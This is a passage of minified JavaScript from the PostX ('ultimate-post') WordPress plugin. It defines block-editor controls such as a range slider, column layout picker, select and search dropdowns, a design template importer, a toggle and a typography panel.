a=t?{...t}:{};t?.onlyUnit?"unit"==o?a.unit=e:a._value=e:(v&&l&&!a?.hasOwnProperty("u"+v)&&(a["u"+v]=a?.hasOwnProperty("unit")?a.unit:"px"),"unit"==o&&y?a["u"+v]=e:(a=y?Object.assign({},t,a,{[v]:e}):e,a=k?a<k?k:a:a<0?0:a,a=w?a>w?w:a:a>1e3?1e3:a)),b?ultp_data.active&&m(a):m(a),_&&(0,n.Gu)(T)},U=e=>{B("increment"==e?Number(I())+Number(L()):Number(I())-Number(L()))};return(0,o.createElement)("div",{className:(0,i.Z)({"ultp-field-wrap ultp-field-range":!0,"ultp-base-control-responsive":y,"ultp-pro-field":b&&!ultp_data.active,"ultp-range-inline":C})},(0,o.createElement)("div",{className:"ultp-field-label-responsive"},g&&(0,o.createElement)("label",null,g),y&&(0,o.createElement)(s.Z,{setDevice:h,device:v}),l&&(0,o.createElement)(p.Z,{unit:l,value:I("unit"),setSettings:B})),(0,o.createElement)("div",{className:"ultp-range-control"},(0,o.createElement)("div",{className:"ultp-range-input ultp-range-input-flex"},(0,o.createElement)("div",{className:"ultp-range-slider-wrap"},(0,o.createElement)("input",{ref:E,type:"range",min:k,max:w,value:I(),step:L(),onChange:e=>B(e.target.value)}),(0,o.createElement)("div",{className:"ultp-range-value",style:{width:`${(()=>{if(!I()||!w)return 0;const e=Number(I()),t=Number(w),l=Number(k||0);return(e-l)/(t-l)*S})()}px`}})),(0,o.createElement)("div",{className:"ultp-input-number-custom"},(0,o.createElement)("input",{type:"number",min:k,max:w,value:I(),step:L(),onChange:e=>B(e.target.value)}),(0,o.createElement)("div",{className:"ultp-input-number-apperance"},(0,o.createElement)("div",{onClick:()=>U("increment"),className:"ultp-input-number-custom-up-icon"},a.ZP.arrowUp2),(0,o.createElement)("div",{onClick:()=>U("decrement"),className:"ultp-input-number-custom-down-icon"},a.ZP.arrowDown2))))),x&&(0,o.createElement)("div",{className:"ultp-sub-help"},(0,o.createElement)("i",null,x)),b&&!ultp_data.active&&(0,o.createElement)("div",{className:"ultp-field-pro-message"},__("Unlock It! Explore More","ultimate-post")," ",(0,o.createElement)("a",{href:(0,r.Z)("https://www.wpxpo.com/postx/all-features/","blockProFeat",ultp_data.affiliate_id),target:"_blank",rel:"noreferrer"},__("Pro Features","ultimate-post"))))}},81931:(e,t,l)=>{"use strict";l.d(t,{Z:()=>s});var o=l(67294),a=l(56834);const{dispatch:i}=wp.data,{Tooltip:n}=wp.components,r={col_1:{lg:[[100]],sm:[[100]],xs:[[100]]},col_2:{lg:[[50,50],[70,30],[30,70],[100,100]],sm:[[50,50],[70,30],[30,70],[100,100]],xs:[[50,50],[70,30],[30,70],[100,100]]},col_3:{lg:[[33.33,33.33,33.34],[25,25,50],[50,25,25],[25,50,25],[20,60,20],[15,70,15],[100,100,100]],sm:[[33.33,33.33,33.34],[25,25,50],[50,25,25],[25,50,25],[20,60,20],[15,70,15],[100,50,50],[50,50,100],[100,100,100]],xs:[[33.33,33.33,33.34],[25,25,50],[50,25,25],[25,50,25],[20,60,20],[15,70,15],[100,50,50],[50,50,100],[100,100,100]]},col_4:{lg:[[25,25,25,25],[20,20,20,40],[40,20,20,20]],sm:[[25,25,25,25],[20,20,20,40],[40,20,20,20],[50,50,50,50],[100,100,100,100]],xs:[[25,25,25,25],[20,20,20,40],[40,20,20,20],[50,50,50,50],[100,100,100,100]]},col_5:{lg:[[20,20,20,20,20],[100,100,100,100,100]],sm:[[20,20,20,20,20],[100,100,100,100,100]],xs:[[20,20,20,20,20],[100,100,100,100,100]]},col_6:{lg:[[16.66,16.66,16.66,16.66,16.66,16.7]],sm:[[16.66,16.66,16.66,16.66,16.66,16.7],[50,50,50,50,50,50],[33.33,33.33,33.34,33.33,33.33,33.34],[100,100,100,100,100,100]],xs:[[16.66,16.66,16.66,16.66,16.66,16.7],[50,50,50,50,50,50],[33.33,33.33,33.34,33.33,33.33,33.34],[100,100,100,100,100,100]]}},s=e=>{const{value:t,label:l,layout:s,responsive:p,device:c,setDevice:u,clientId:d}=e,m=wp.data.select("core/block-editor").getBlocks(d);return(0,o.createElement)("div",{className:"ultp-field-wrap ultp-field-layout"},(0,o.createElement)("div",{className:"ultp-columnLayout-label"},l&&(0,o.createElement)("label",null,l),p&&(0,o.createElement)(a.Z,{setDevice:u,device:c})),(0,o.createElement)("div",{className:"ultp-field-layout-wrapper ultp-panel-column"},r["col_"+t.lg.length][c].map(((e,l)=>{const a=e.every((e=>e>99));return(0,o.createElement)(n,{delay:0,visible:!0,position:"bottom",text:e.join(" : "),key:l},(0,o.createElement)("div",{className:"ultp-row-size ultp-field-layout-items "+(t[c]==e.join(",")?"active":""),onClick:()=>{i("core/block-editor").updateBlockAttributes(d,{layout:Object.assign({},s,{[c]:e})}),m?.length>0&&m.forEach(((t,l)=>{i("core/block-editor").updateBlockAttributes(t.clientId,{columnWidth:Object.assign({},t.attributes.columnWidth,{[c]:e[l]})})}))},style:{flexDirection:(a?"column":"")+" "}},e.map(((e,t,l)=>4!=l.length&&6!=l.length||JSON.stringify(l)!=JSON.stringify([50,50,50,50])&&JSON.stringify(l)!=JSON.stringify([50,50,50,50,50,50])&&JSON.stringify(l)!=JSON.stringify([33.33,33.33,33.34,33.33,33.33,33.34])?(0,o.createElement)("div",{className:e>99?"ultp-layout-vertical":"",style:{width:`${e}%`},key:t}):(0,o.createElement)("div",{className:"ultp-layout-half",style:{width:`calc(${e}% - 5px )`},key:t})))))}))))}},68073:(e,t,l)=>{"use strict";l.d(t,{Z:()=>u});var o=l(67294),a=l(64766),i=l(83100);const{__}=wp.i18n,{apiFetch:n}=wp,{useState:r,useEffect:s,useRef:p}=wp.element,{Spinner:c}=wp.components,u=e=>{const t=p(),[l,u]=r(!1),[d,m]=r([]),[g,y]=r(""),[b,v]=r(!0),{label:h,value:f,onChange:k,search:w,condition:x,pro:T,single:_=!1,noIdInTitle:C=!1,postType:E=[]}=e,S=async(e="")=>{v(!0),n({path:"/ultp/v1/search",method:"POST",data:{type:w,term:e,condition:x,postType:E}}).then((e=>{if(e.success)if(f.length>0&&e.data.length>0){const t=JSON.stringify(f),l=e.data.filter((function({value:e,title:l,live_title:o}){return t.indexOf(JSON.stringify("taxvalue"==w&&o?{value:e,title:l,live_title:o}:{value:e,title:l}))<0}));m(l),v(!1)}else m(e.data),v(!1)}))},P=e=>{t.current.contains(e.target)||u(!1)};s((()=>(document.addEventListener("mousedown",P),()=>document.removeEventListener("mousedown",P))),[]);const L=(e=!0)=>{T&&!ultp_data.active||(e&&(v(!0),S()),u(e))};return(0,o.createElement)("div",{className:"ultp-field-search ultp-field-wrap ultp-field-select "+(T&&!ultp_data.active?"ultp-pro-field":"")},h&&(0,o.createElement)("span",{className:"ultp-label-control"},(0,o.createElement)("label",null,h)),(0,o.createElement)("div",{ref:t,className:"ultp-popup-select ultp-multiple-value-select"},(0,o.createElement)("span",{className:(l?"isOpen ":"")+" ultp-selected-text ultp-selected-dropdown--icon"},(0,o.createElement)("span",{onClick:()=>L(!0),className:"ultp-search-value ultp-multiple-value"},f.map(((e,t)=>(0,o.createElement)("span",{key:t},!_&&(0,o.createElement)("span",{className:"ultp-updown-container"},(0,o.createElement)("span",{onClick:e=>{e.stopPropagation(),(e=>{if(T&&!ultp_data.active)return;const t=f.slice(0);f.length>e+1&&(t[e+1]=t.splice(e,1,t[e+1])[0],m(t),k(t))})(t)},className:"ultp-select-swap dashicons dashicons-arrow-down-alt2"})),C?e.title?.replaceAll("&amp;","&").replace(/^\[ID:\s\d+\]/,"").trim():e.title?.replaceAll("&amp;","&"),(0,o.createElement)("span",{onClick:()=>(e=>{if(T&&!ultp_data.active)return;f.splice(e,1);const t=d.filter((function(e){return f.indexOf(e)<0}));m(t),k(f)})(t),className:"ultp-select-close"},"×"))))),(0,o.createElement)("span",{className:"ultp-search-divider"}),(0,o.createElement)("span",{className:"ultp-search-icon ultp-search-dropdown--icon",onClick:()=>L(!l)},l?a.ZP.arrowUp2:a.ZP.arrowDown2)),(0,o.createElement)("span",null,l&&(0,o.createElement)("ul",null,(0,o.createElement)("div",{className:"ultp-select-search"},(0,o.createElement)("input",{type:"text",placeholder:__("Search here for more…","ultimate-post"),value:g,onChange:e=>(e=>{const t=e.target.value;t.length>0&&S(t),y(t)})(e),autoComplete:"off"}),b&&(0,o.createElement)(c,null)),d.map(((e,t)=>(0,o.createElement)("li",{key:t,onClick:()=>(e=>{if(T&&!ultp_data.active)return;_&&f.splice(0,f.length),f.push(e);const t=d.filter((function(e){return f.indexOf(e)<0}));m(t),k(f),u(!1)})(e)},C?e.title?.replaceAll("&amp;","&").replace(/^\[ID:\s\d+\]/,"").trim():e.title?.replaceAll("&amp;","&"))))))),T&&!ultp_data.active&&(0,o.createElement)("div",{className:"ultp-field-pro-message"},__("To Enable This Feature","ultimate-post")," ",(0,o.createElement)("a",{href:(0,i.Z)("https://www.wpxpo.com/postx/all-features/","blockProFeat",ultp_data.affiliate_id),target:"_blank",rel:"noreferrer"},__("Upgrade to Pro","ultimate-post"))))}},22217:(e,t,l)=>{"use strict";l.d(t,{Z:()=>g});var o=l(67294),a=l(64766),i=l(20107),n=l(53049),r=l(83100),s=l(56834);const{__}=wp.i18n,{Fragment:p,useState:c,useEffect:u,useRef:d}=wp.element,m=({dynamicHelpText:e,value:t})=>Object.keys(e?.select).map((l=>l==t?(0,o.createElement)("i",null," ",e?.select[l]," "):"")),g=e=>{const{label:t,responsive:l,options:g,multiple:y,value:b,pro:v,image:h,setDevice:f,device:k,onChange:w,help:x,condition:T,keys:_,beside:C,svg:E,svgClass:S,clientId:P,updateChild:L,defaultMedia:I,classes:B,proLink:U,dynamicHelpText:M}=e,A=d(),[H,N]=c(!1);u((()=>{const e=e=>{A.current.contains(e.target)||N(!1)};return document.addEventListener("mousedown",e),()=>document.removeEventListener("mousedown",e)}),[]);const j=e=>{if(!v||ultp_data.active){if(y){const t=b.length?b:[];-1==b.indexOf(e)&&t.push(e),w(t)}else{let t=!0;if(T&&Object.keys(T).forEach((function(l){e==l&&(t=!1,w(Object.assign({},{[_]:e},T[l])))})),t){const t=l?Object.assign({},b,{[k]:e}):e;w(t)}}L&&(0,n.Gu)(P)}},Z=(e,t)=>{const l=g.filter((t=>t.value==e));if(l[0])return t&&l[0].svg?l[0].svg:l[0].label},O=e=>{window.open(e||U||ultp_data.premium_link,"_blank")};return(0,o.createElement)(p,null,(0,o.createElement)("div",{ref:A,className:`ultp-field-wrap ultp-field-select ${B||""} ${v&&!ultp_data.active?"ultp-pro-field":""} `},(0,o.createElement)("div",{className:C?"ultp-field-beside":""},(0,o.createElement)("div",{className:"ultp-label-control"},t&&(0,o.createElement)("label",null,t),l&&!y&&(0,o.createElement)(s.Z,{setDevice:f,device:k})),(0,o.createElement)("div",{className:"ultp-popup-select "+(E?"svgIcon "+S:"")},(0,o.createElement)("span",{tabIndex:0,className:(0,i.Z)({isOpen:H,"ultp-selected-text":!0,"ultp-multiple-value-added":y&&b?.length>0}),onClick:()=>N(!H)},y?(0,o.createElement)("span",{className:"ultp-search-value ultp-multiple-value ultp-select-dropdown--tag "},b.map(((e,t)=>(0,o.createElement)("span",{key:t,onClick:()=>{return t=e,void w(b.filter((e=>e!=t)));var t}},Z(e)&&Z(e).replaceAll("&amp;","&"),(0,o.createElement)("span",{className:"ultp-select-close"},a.ZP?.close_line))))):(0,o.createElement)("span",{className:"ultp-search-value"},I?(0,o.createElement)("img",{src:(e=>{const t=g.filter((t=>t.value==e));return ultp_data.url+t[0].img})(b)}):Z(y?b||[]:b?l?b[k]||"":b:"",E)),y&&(0,o.createElement)("span",{className:"ultp-search-divider"}),(0,o.createElement)("div",{className:"ultp-search-icon"},H?a.ZP.arrowUp2:a.ZP.arrowDown2)),H&&(0,o.createElement)("ul",null,g.map(((e,t)=>(0,o.createElement)("li",{key:t,onClick:()=>{e.disabled||(N(!H),e.pro?ultp_data.active?j(e.value):(e.isHeader||e.isChild)&&O(e.link):j(e.value))},value:e.value,className:(0,i.Z)({"ultp-select-header":e.isHeader,"ultp-select-header-pro":e.isHeader&&e.pro&&!ultp_data.active,"ultp-select-group":e.isChild,"ultp-select-group-pro":e.isChild&&e.pro&&!ultp_data.active,"ultp-select-matched":y?b.includes(e.value):b===e.value})},E&&e.svg?e.svg:h?(0,o.createElement)("img",{alt:e.label||"",src:ultp_data.url+e.img}):(0,o.createElement)(p,null,e.label.replaceAll("&amp;","&")," ",e.isHeader&&e.pro&&!ultp_data.active&&(0,o.createElement)("span",{className:"ultp-pro-text2"},"(Get Pro)")),a.ZP[e.icon]||""," ",!e.pro||e.isHeader||e.isChild||ultp_data.active?null:(0,o.createElement)("span",{onClick:()=>O(e.link),className:"ultp-pro-text"},"[Pro]"))))))),x&&(0,o.createElement)("div",{className:"ultp-sub-help"},(0,o.createElement)("i",null,x)),M&&M?.select?.key==_&&(0,o.createElement)("div",{className:"ultp-sub-help"},(0,o.createElement)(m,{dynamicHelpText:M,value:b})),v&&!ultp_data.active&&(0,o.createElement)("div",{className:"ultp-field-pro-message"},__("To Enable This Feature","ultimate-post")," ",(0,o.createElement)("a",{href:(0,r.Z)("https://www.wpxpo.com/postx/all-features/","blockProFeat",ultp_data.affiliate_id),target:"_blank",rel:"noreferrer"},__("Upgrade to Pro","ultimate-post")))))}},64390:(e,t,l)=>{"use strict";l.d(t,{Z:()=>a});var o=l(67294);const a=e=>{const{label:t,fancy:l}=e;return l&&t?(0,o.createElement)("div",{className:"ultp-separator-ribbon-wrapper"},(0,o.createElement)("div",{className:"ultp-separator-ribbon"},t)):(0,o.createElement)("div",{className:"ultp-field-wrap ultp-field-separator"+(t?"":" ultp-separator-padding")},(0,o.createElement)("div",null,t&&(0,o.createElement)("span",null,t)))}},42616:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294),a=l(64766),i=l(20107);const n=e=>{const{value:t,options:l,label:n,toolbar:r,disabled:s,onChange:p,inline:c}=e,u=l||[{value:"h1",label:"H1"},{value:"h2",label:"H2"},{value:"h3",label:"H3"},{value:"h4",label:"H4"},{value:"h5",label:"H5"},{value:"h6",label:"H6"},{value:"p",label:"P"},{value:"div",label:"DIV"},{value:"span",label:"SPAN"}];return(0,o.createElement)("div",{className:(0,i.Z)({"ultp-field-wrap ultp-field-tag":!0,"ultp-taginline":c,"ultp-tag-inline":r,"ultp-label-space":n})},n&&(0,o.createElement)("label",{className:"ultp-field-label"},n),(0,o.createElement)("div",{className:"ultp-sub-field"},u.map(((e,l)=>(0,o.createElement)("span",{key:l,tabIndex:0,className:e.value==t?"ultp-tag-button active":"ultp-tag-button",onClick:()=>{return l=e.value,void p(s&&t==l?"":l);var l}},e.icon&&(0,o.createElement)("div",{className:"ultp-tag-icon"},a.ZP[e.icon]),e.label)))))}},53956:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294);const{__}=wp.i18n,{useState:a,useEffect:i}=wp.element,n=e=>{const{clientId:t,attributes:l,label:n,name:r}=e.store,[s,p]=a({designList:[],error:!1,reload:!1,reloadId:""}),{designList:c,error:u,reload:d,reloadId:m}=s;i((()=>{(async()=>{const e=r.split("/");wp.apiFetch({path:"/ultp/v2/fetch_premade_data",method:"POST",data:{type:"design"}}).then((t=>{if(t.success){const l=JSON.parse(t.data);p({...s,designList:l[e[1]]})}}))})()}),[]);const g=e=>{const{replaceBlock:o}=wp.data.dispatch("core/block-editor"),a=["queryNumber","queryNumPosts","queryType","queryTax","queryRelation","queryOrderBy","queryOrder","queryInclude","queryExclude","queryAuthor","queryOffset","metaKey","queryExcludeTerm","queryExcludeAuthor","querySticky","queryUnique","queryPosts","queryCustomPosts"];window.fetch("https://ultp.wpxpo.com/wp-json/restapi/v2/single-design",{method:"POST",body:new URLSearchParams("license="+ultp_data.license+"&design_id="+e)}).then((e=>e.text())).then((e=>{if((e=JSON.parse(e)).success&&e.rawData){const i=wp.blocks.parse(e.rawData);let n=i[0].attributes;for(let e=0;e<a.length;e++)n[a[e]]&&delete n[a[e]];n=Object.assign({},l,n),i[0].attributes=n,p({...s,error:!1,reload:!1,reloadId:""}),o(t,i)}else p({...s,error:!0,reload:!1,reloadId:""})})).catch((e=>{console.error(e)}))};return void 0===c?null:(0,o.createElement)("div",{className:"ultp-field-wrap ultp-field-template"},n&&(0,o.createElement)("label",null,n),(0,o.createElement)("div",{className:"ultp-sub-field-template"},c.map(((e,t)=>(0,o.createElement)("div",{key:t,className:"ultp-field-template-item "+(e.pro&&!ultp_data.active?"ultp-field-premium":"")},(0,o.createElement)("img",{loading:"lazy",src:e.image}),e.pro&&!ultp_data.active&&(0,o.createElement)("span",{className:"ultp-field-premium-badge"},__("Premium","ultimate-post")),e.pro&&!ultp_data.active?(0,o.createElement)("div",{className:"ultp-field-premium-lock"},(0,o.createElement)("a",{href:ultp_data.premium_link,target:"_blank",rel:"noreferrer"},__("Go Pro","ultimate-post"))):e.pro&&u?(0,o.createElement)("div",{className:"ultp-field-premium-lock"},(0,o.createElement)("a",{href:ultp_data.premium_link,target:"_blank",rel:"noreferrer"},__("Get License","ultimate-post"))):(0,o.createElement)("div",{className:"ultp-field-premium-lock"},(0,o.createElement)("button",{className:"ultp-popup-btn",onClick:()=>{return t=e.ID,l=e.pro,p({...s,reload:!0,reloadId:t}),void(l?ultp_data.active&&g(t):g(t));var t,l}},__("Import","ultimate-post"),d&&m==e.ID&&(0,o.createElement)("span",{className:"dashicons dashicons-update rotate"}))))))))}},34774:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294);const{__}=wp.i18n,{TextControl:a,TextareaControl:i}=wp.components,n=e=>{const{value:t,onChange:l,isTextField:n,attr:r,DC:s=null}=e,{placeholder:p,label:c,help:u,disabled:d=!1}=r,m=e=>{l(e)};return(0,o.createElement)("div",{className:"ultp-field-wrap ultp-field-groupbutton"},s&&c&&(0,o.createElement)("div",{className:"ultp-field-label-responsive"},(0,o.createElement)("label",{htmlFor:""},c)),(0,o.createElement)("div",{className:s?"ultp-acf-field"+(n?"":"-textarea"):""},n?(0,o.createElement)(a,{__nextHasNoMarginBottom:!0,value:t,placeholder:p,label:s?"":c,help:u,disabled:d,onChange:e=>m(e)}):(0,o.createElement)(i,{value:t,label:s?"":c,placeholder:p,disabled:d,onChange:e=>m(e)}),s))}},60405:(e,t,l)=>{"use strict";l.d(t,{Z:()=>s});var o=l(67294),a=l(53049),i=l(83100);const{__}=wp.i18n,{Fragment:n}=wp.element,{ToggleControl:r}=wp.components,s=e=>{const{value:t,label:l,pro:s,help:p,onChange:c,clientId:u,updateChild:d,disabled:m=!1,showDisabledValue:g=!1}=e,y=e=>{m||c(e)};return(0,o.createElement)("div",{className:"ultp-field-wrap ultp-field-toggle"},(0,o.createElement)("div",{className:"ultp-sub-field"},(0,o.createElement)(r,{className:"ultp-field-toggle__element",__nextHasNoMarginBottom:!0,help:p,checked:m?!!g&&t:t,label:l?(0,o.createElement)(n,null,(0,o.createElement)("label",{className:"ultp-field-label"},l),s&&!ultp_data.active?(0,o.createElement)("a",{className:"ultp-field-pro-message-inline",href:(0,i.Z)("https://www.wpxpo.com/postx/all-features/","blockProFeat",ultp_data.affiliate_id),target:"_blank",rel:"noreferrer"},__("Pro Features","ultimate-post")):""):"",onChange:e=>(e=>{s?ultp_data.active&&y(e):y(e),d&&(0,a.Gu)(u)})(e)})))}},7106:(e,t,l)=>{"use strict";l.d(t,{Z:()=>x});var o=l(67294),a=l(87763),i=l(64766),n=l(20107),r=l(60448),s=l(53049),p=l(83100),c=l(7928),u=l(32030),d=l(56834),m=l(45484);const{__}=wp.i18n,{useState:g,useEffect:y}=wp.element,{Dropdown:b,SelectControl:v,ToolbarButton:h,TabPanel:f}=wp.components,{fontSizes:k}=wp.data.select("core/block-editor").getSettings(),w=({value:e,openGlobalTypo:t,setOpenGlobalTypo:l,globalTypos:a,onChange:n,typoHtml:s})=>(0,o.createElement)("div",{className:"ultp-field-typo-settings ultp-common-popup"},(0,o.createElement)("div",{className:"ultp-field-global-typo ultp-typo-family ultp-typo-family-wrap"},(0,o.createElement)("div",{className:"ultp-typo-family"},(0,o.createElement)("div",{className:"ultp-field-label"},__("Select Global Style","ultimate-post")),(0,o.createElement)("div",{className:"ultp-family-group"},(0,o.createElement)("span",{className:"ultp-family-field-data",onClick:()=>l(!t)},e&&(0,r.nl)(e.presetTypo,"typo")||__("Select Global","ultimate-post"),t?(0,o.createElement)("span",{className:"dashicons dashicons-arrow-up-alt2"}):(0,o.createElement)("span",{className:"dashicons dashicons-arrow-down-alt2"})),(0,o.createElement)("div",{className:"ultp-preset-label-link",onClick:()=>(0,r.je)("typo")},"Customize ",i.ZP?.rightAngle2)),t&&(0,o.createElement)("div",{className:"ultp-family-field"},(0,o.createElement)("div",{className:"ultp-family-list preset-family"},a.map(((e,t)=>!["Body_and_Others_typo","Heading_typo","presetTypoCSS"].includes(e)&&(0,o.createElement)("span",{style:(0,r.xP)(e),key:t,onClick:()=>{l(!1),n((0,r.sR)(e))}},(0,r.nl)(e,"typo")))))))),s()),x=e=>{const{value:t,disableClear:l,label:x,device:T,setDevice:_,onChange:C,presetSetting:E,presetSettingParent:S,isToolbar:P=!1}=e,[L,I]=g({open:!1,text:"",custom:!1}),[B,U]=g(!1),{open:M,text:A,custom:H}=L,N=(0,s.RQ)();__("Normal","ultimate-post"),__("Italic","ultimate-post"),__("Oblique","ultimate-post"),__("Initial","ultimate-post"),__("Inherit","ultimate-post"),__("None","ultimate-post"),__("Inherit","ultimate-post"),__("Underline","ultimate-post"),__("Overline","ultimate-post"),__("Line Through","ultimate-post"),y((()=>{(async()=>{const e=R();let l=!1;(k||[{size:13},{size:16},{size:20}]).forEach((t=>{e==t.size&&(l=!0)})),l||void 0!==t.size||(l=!0),I({...L,custom:l})})()}),[]);const j=e=>{if(e&&e.family&&"none"!=e.family&&(0,r.MR)(e.family)){let t=u.Z.filter((t=>t.n==e.family));return 0==t.length&&(t=m.Z.filter((t=>t.n==e.family))),0==t.length&&(t=N.filter((t=>t.n==e.family))),void 0!==t[0]?(t=t[0].v,t.map((e=>({value:e,label:e})))):[{value:"",label:"- None -"}]}return[{value:"100",label:"100"},{value:"200",label:"200"},{value:"300",label:"300"},{value:"400",label:"400"},{value:"500",label:"500"},{value:"600",label:"600"},{value:"700",label:"700"},{value:"800",label:"800"},{value:"900",label:"900"}]},Z=(e,l,o)=>{if("family"==e){if(l){I({...L,open:!1}),l={[e]:l,type:("google"==o?u.Z:"custom_font"==o?N:m.Z).filter((e=>e.n==l))[0].f};const t=j(l);t[0]&&(l={...l,weight:t[0].value})}}else l="define"==e?{size:Object.assign({},t.size,{[T]:l})}:{[e]:l};C(Object.assign({},t,l))},O=e=>e.filter((e=>A?-1!==e.n.toLowerCase().indexOf(A)?{value:e.n}:void 0:{value:e.n})),R=()=>t?.size?t.size[T]:"",D=()=>(0,o.createElement)("div",{className:"ultp-field-typography"},(0,o.createElement)("div",{className:"ultp-typo-section ultp-typo-fontFamily"},(0,o.createElement)("div",{className:"ultp-typo-family ultp-typo-family-wrap"},(0,o.createElement)("div",{className:"ultp-typo-family"},(0,o.createElement)("label",{className:"ultp-field-label"},"Font Family"),(0,o.createElement)("span",{className:"ultp-family-field-data "+(S?"parent-typo":""),onClick:()=>I({...L,open:!M})},t&&(0,r.MR)(t.family)||__("Select Font","ultimate-post"),M?(0,o.createElement)("span",{className:"dashicons dashicons-arrow-up-alt2"}):(0,o.createElement)("span",{className:"dashicons dashicons-arrow-down-alt2"})),M&&(0,o.createElement)("span",{className:"ultp-family-field"},(0,o.createElement)("span",{className:"ultp-family-list"},(0,o.createElement)("input",{type:"text",onChange:e=>{return t=e.target.value,void I({...L,text:t});var t},placeholder:"Search..",value:A}),$.length>0&&(0,o.createElement)(o.Fragment,null,(0,o.createElement)("span",{className:"ultp-family-disabled"},"Custom Fonts"),$.map(((e,t)=>(0,o.createElement)("span",{className:"ultp_custom_font_option",key:t,onClick:()=>Z("family",e.n,"custom_font")},e.n," ",!ultp_data.active&&(0,o.createElement)("a",{href:K,target:"blank"},"(PRO)"))))),G.length>0&&(0,o.createElement)(o.Fragment,null,(0,o.createElement)("span",{className:"ultp-family-disabled"},"System Fonts"),G.map(((e,t)=>(0,o.createElement)("span",{key:t,onClick:()=>Z("family",e.n,"system")},e.n)))),V?(0,o.createElement)("span",{className:"ultp-family-disabled",style:{color:"red"}},"Google Fonts Disabled"):(0,o.createElement)(o.Fragment,null,q.length>0&&(0,o.createElement)(o.Fragment,null,(0,o.createElement)("span",{className:"ultp-family-disabled"},"Google Fonts"),q.map(((e,t)=>(0,o.createElement)("span",{key:t,onClick:()=>Z("family",e.n,"google")},e.n)))))))))),!S&&(0,o.createElement)("div",{className:"ultp-typo-option"},H?(0,o.createElement)(c.Z,{min:1,max:300,step:1,unit:["px","em","rem"],responsive:!0,typo:!0,label:__("Size","ultimate-post"),value:t&&t.size,device:T,setDevice:_,onChange:e=>Z("size",e),handleTypoFieldPresetData:r.MR}):(0,o.createElement)(o.Fragment,null,(0,o.createElement)("div",{className:"ultp-field-label-responsive"},(0,o.createElement)("label",null,"Size"),(0,o.createElement)(d.Z,{setDevice:_,device:T})),(0,o.createElement)("div",{className:"ultp-default-font-field"},(k||[{size:13},{size:16},{size:20}]).map(((e,t)=>(0,o.createElement)("span",{key:t,className:"ultp-default-font"+(W==e.size?" active":""),onClick:()=>{Z("define",e.size),I({...L,custom:!1})}},e.size))))),(0,o.createElement)("div",{className:"ultp-typo-custom-setting"+(H?" active":""),onClick:()=>I({...L,custom:!H})},H?i.ZP.link:i.ZP.unlink)),(0,o.createElement)("div",{className:"ultp-typo-container"},(0,o.createElement)("div",{className:"ultp-typo-section ultp-typo-weight"},(0,o.createElement)(v,{__nextHasNoMarginBottom:!0,label:__("Weight","ultimate-post"),value:t&&t.weight,options:j(t),onChange:e=>Z("weight",e)})),!S&&(0,o.createElement)("div",{className:"ultp-typo-section ultp-typo-height"},(0,o.createElement)(c.Z,{min:1,max:300,step:1,responsive:!0,device:T,setDevice:_,unit:["px","em","rem"],label:__("Height","ultimate-post"),value:t&&t.height,onChange:e=>Z("height",e),handleTypoFieldPresetData:r.MR})),(0,o.createElement)("div",{className:"ultp-typo-section ultp-typo-spacing  "+(S?"preset-active":"")},(0,o.createElement)(c.Z,{min:-10,max:30,responsive:!0,step:.1,unit:["px","em","rem"],device:T,setDevice:_,label:__("Spacing","ultimate-post"),value:t&&t.spacing,onChange:e=>Z("spacing",e),handleTypoFieldPresetData:r.MR}))),(0,o.createElement)("div",{className:"ultp-typo-container ultp-typ-family ultp-typo-spacing-container"},(0,o.createElement)("div",{className:"ultp-typo-container ultp-style-container"},(0,o.createElement)("div",{className:"ultp-transform-style"},(0,o.createElement)("span",{title:"italic",style:{fontStyle:"italic"},className:"italic"==t.style?"active":"",onClick:()=>Z("style","italic"==t.style?"normal":"italic")},"l"),(0,o.createElement)("span",{title:"underline",style:{textDecoration:"underline"},className:"underline"==t.decoration?"active":"",onClick:()=>Z("decoration","underline"==t.decoration?"none":"underline")},"U"),(0,o.createElement)("span",{title:"line-through",style:{textDecoration:"line-through"},className:"line-through"==t.decoration?"active":"",onClick:()=>Z("decoration","line-through"==t.decoration?"none":"line-through")},"U"),(0,o.createElement)("span",{title:"uppercase",style:{textTransform:"uppercase"},className:"uppercase"==z?"active":"",onClick:()=>Z("transform","uppercase"==z?"":"uppercase")},"tt"),(0,o.createElement)("span",{title:"lowercase",style:{textTransform:"lowercase"},className:"lowercase"==z?"active":"",onClick:()=>Z("transform","lowercase"==z?"":"lowercase")},"tt"),(0,o.createElement)("span",{title:"capitalize",style:{textTransform:"capitalize"},className:"capitalize"==z?"active":"",onClick:()=>Z("transform","capitalize"==z?"":"capitalize")},"tt"))))),z=t&&t.transform?t.transform:"",F=!(!t||!t.openTypography),W=R(),V=!(!ultp_data.settings?.hasOwnProperty("disable_google_font")||"yes"!=ultp_data.settings.disable_google_font),G=O(m.Z),q=O(u.Z),$=O(N),K=(0,p.Z)("","customFont",ultp_data.affiliate_id),J=(0,r.RK)();return(0,o.createElement)("div",{className:(0,n.Z)({"ultp-field-typo":!0,"ultp-field-wrap":!P,"ultp-preset-typo":S,"ultp-label-space":x})},(0,o.createElement)("div",{className:"ultp-flex-content"},!P&&x&&(0,o.createElement)("label",null,x),E?D():(0,o.createElement)(b,{contentClassName:(0,n.Z)({"ultp-field-dropdown-content ultp-typography-dropdown-content":!0,"ultp-typography-toolbar":P}),renderToggle:({isOpen:e,onToggle:t})=>P?(0,o.createElement)(h,{className:"ultp-typography-toolbar-btn",label:x||"Typography",onClick:()=>{t(),Z("openTypography",1)}},(0,o.createElement)("img",{src:ultp_data.url+"assets/img/toolbar/typography.svg"})):(0,o.createElement)("div",{className:"ultp-edit-btn"},(0,o.createElement)("div",{className:"ultp-typo-control"},!l&&F&&(0,o.createElement)("div",{className:"active ultp-base-control-btn ultp-color2-reset-btn",onClick:()=>{e&&t(),Z("openTypography",0)}},i.ZP?.reset_left_line),(0,o.createElement)("div",{className:(F?"active ":"")+" ultp-icon-style",onClick:()=>{t(),Z("openTypography",1)}},a.Z.typography))),renderContent:()=>(0,o.createElement)(o.Fragment,null,P?(0,o.createElement)(f,{className:"ultp-toolbar-tab",tabs:[{name:"typo",title:x}]},(e=>(0,o.createElement)(w,{value:t,openGlobalTypo:B,setOpenGlobalTypo:U,globalTypos:J,onChange:C,typoHtml:D}))):(0,o.createElement)(w,{value:t,openGlobalTypo:B,setOpenGlobalTypo:U,globalTypos:J,onChange:C,typoHtml:D}))})))}},32030:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const 